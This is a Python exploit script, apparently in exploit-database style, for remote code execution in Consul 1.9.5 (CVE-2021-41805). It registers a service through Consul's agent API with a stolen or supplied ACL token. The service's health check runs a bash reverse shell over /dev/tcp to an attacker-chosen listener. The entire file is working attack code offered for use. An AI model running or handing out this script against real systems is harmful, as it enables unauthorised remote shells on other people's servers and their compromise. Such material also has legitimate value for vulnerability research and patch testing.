#!/usr/bin/env python3

""" 
Exploit Title: Consul 1.9.5 - Remote Code Execution (RCE)
CVE-2021-41805
"""
import requests, sys

# Get the target and listener info from the user
def getInput():
    rhost = input("\n[\033[1;37m+\033[1;37m] Enter the target: ")
    rport = input("\n[\033[1;37m+\033[1;37m] Enter the listener port: ")
    lhost = input("\n[\033[1;37m+\033[1;37m] Enter the listener IP: ")
    lport = input("\n[\033[1;37m+\033[1;37m] Enter the listener port: ")
    acl_token = input("\n[\033[1;37m+\033[1;37m] Enter the ACL token: ")
    return rhost, rport, lhost, lport, acl_token

# Send the request to the target and get connection
def exploit():
    rhost,rport,lhost,lport,acl_token = getInput()
    target = f"http://{rhost}:{rport}/v1/agent/service/register"
    headers = {"X-Consul-Token": acl_token}
    json = {
        "Address": "127.0.0.1",
        "check": {
            "Args": [
                "/bin/bash", "-c", f"bash -i >& /dev/tcp/{lhost}/{lport} 0>&1"
            ],
            "interval": "10s",
            "Timeout": "864000s",
        },
        "ID": "test",
        "Name": "test",
        "Port": 80
    }
    
    try:
        requests.put(target, headers=headers, json=json)
        print("\n[\033[1;32m+\033[1;37m] Request sent successfully, check your listener......\n")
    except:
        print("\n[\033[1;31m-\033[1;37m] Something went wrong, check the connection info and try again.....\n")
        exit(1)

try:    
    exploit()
except KeyboardInterrupt:
    print("\n[\033[1;31m-\033[1;37m] Exiting.....\n")